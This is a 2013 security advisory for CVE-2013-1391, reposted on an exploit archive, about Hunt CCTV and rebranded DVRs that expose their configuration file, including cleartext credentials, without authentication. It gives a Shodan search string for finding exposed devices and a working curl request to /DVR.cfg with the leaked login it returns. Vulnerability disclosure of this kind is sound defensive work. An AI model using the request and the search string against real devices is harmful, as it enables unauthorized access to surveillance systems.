Hunt CCTV Credential Disclosure

Hunt CCTV Credential Disclosure: Posted Jan 28, 2013; Authored by Alejandro Ramos; Hunt CCTV and generic brands suffer from a file disclosure vulnerability that discloses authentication information.; tags | exploit, info disclosure; advisories | CVE-2013-1391; SHA-256 | 14b74ae440b4a6e07d0a98ee13f99a611c71523e6ac3e975712c53334e4ca50b; Download | Favorite | View

Hunt CCTV Credential Disclosure

Hunt CCTV (and generics brands) Insufficient Authentication
January 17, 2013 - A. Ramos <aramosf @ gmail . com>

-- CVE ID:
CVE-2013-1391 [reserved]

-- Affected Vendors:
Hunt CCTV (http://www.huntcctv.com/)
** generic brands from Hunt **
Capture CCTV (http://www.capturecctv.ca/)
NoVus CCTV (http://www.novuscctv.com/)
Well-Vision Inc (http://well-vision.com/)

-- Affected Models:
DVR-04 / DVR-04CH (HuntCCTV)
DVR-04NC (HuntCCTV)
DVR-08 / DVR-08CH (HuntCCTV)
DVR-08NC (HuntCCTV)
DVR-16 / DVR-16CH (HuntCCTV)
CDR 0410VE (CaptureCCTV-HuntCCTV)
CDR 0820VDE (CaptureCCTV-HuntCCTV)
DR6-704A4H (HuntCCTV)
DR6-708A4H (HuntCCTV)
DR6-7316A4H (HuntCCTV)
DR6-7316A4HL (HuntCCTV)
HDR-04KD (unknown-HuntCCTV)
HDR-08KD (unknown-HuntCCTV)
HV-04RD PRO (Hachi-HuntCCTV)
HV-08RD PRO (Hachi-HuntCCTV)
NV-DVR1204 (NovusSec)
NV-DVR1208 (NovusSec)
NV-DVR1216 (NovusSec)
TW-DVR604 (Well Vision INC Solutions-HuntCCTV)
TW-DVR616 (Well Vision INC Solutions-HuntCCTV)

Shodan dork: Basic realm="DVR" server: httpd -mini
Shodan results: 46890
Vulnerable: >70%

-- Vulnerability Details:
You can get the entire backup config with simple GET. No authentication
required.
All information are in clear text: admin panel, ddns config, ppoe
credentials, misc.

Example:

[aramosf@velouria data]$ curl -v http://x.x.x.x/DVR.cfg | strings |grep -i
USER
*   Trying x.x.x.x... connected
 * Connected to x.x.x.x (x.x.x.x) port 80 (#0)
> GET /DVR.cfg HTTP/1.1
> User-Agent: curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/
3.13.1.0 zlib/1.2.3 libidn/1.18 libssh2/1.2.2
> Host: x.x.x.x
> Accept: */*
>
< HTTP/1.0 200 Ok
< Server: httpd
< Date: Fri, 17 Jan 2013 05:47:02 GMT
< Cache-Control: no-cache
< Pragma: no-cache
< Expires: 0
< Connection: close
< Content-Type: application/octet-stream
<
USER1_USERNAME=iam
USER1_PASSWORD=sexy

Vulnerable firmware (127 different ones):
  - 1.1.10 to 1.1.92
  - 1.47 to 1.51
  - 2.0.0 to 2.1.93
  - 3.0.04 to 3.1.92

-- Disclosure Timeline:
2011-09-?? - Vulnerability discovered
2012-12-20 - Published in the book "Hacker Epico" (
http://www.hackerepico.com)
2013-01-15 - CVE Assigned
2013-01-20 - Vulnerability reported to vendor
2013-01-24 - Vulnerability reported to GDT (Spain)
2013-01-28 - Public disclosure:
http://www.securitybydefault.com/2013/01/12000-grabadores-de-video-expuestos-en.html

-- 
Alejandro Ramos
www.securitybydefault.com

Top Authors In Last 30 Days

Red Hat 232 files
Ubuntu 59 files
Debian 27 files
Valentin Lobstein 11 files
LiquidWorm 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
Yevhenii Butenko 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,318)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,567)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,456)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

Hunt CCTV Credential Disclosure

Hunt CCTV Credential Disclosure

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Hunt CCTV Credential Disclosure

Share This

Hunt CCTV Credential Disclosure

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems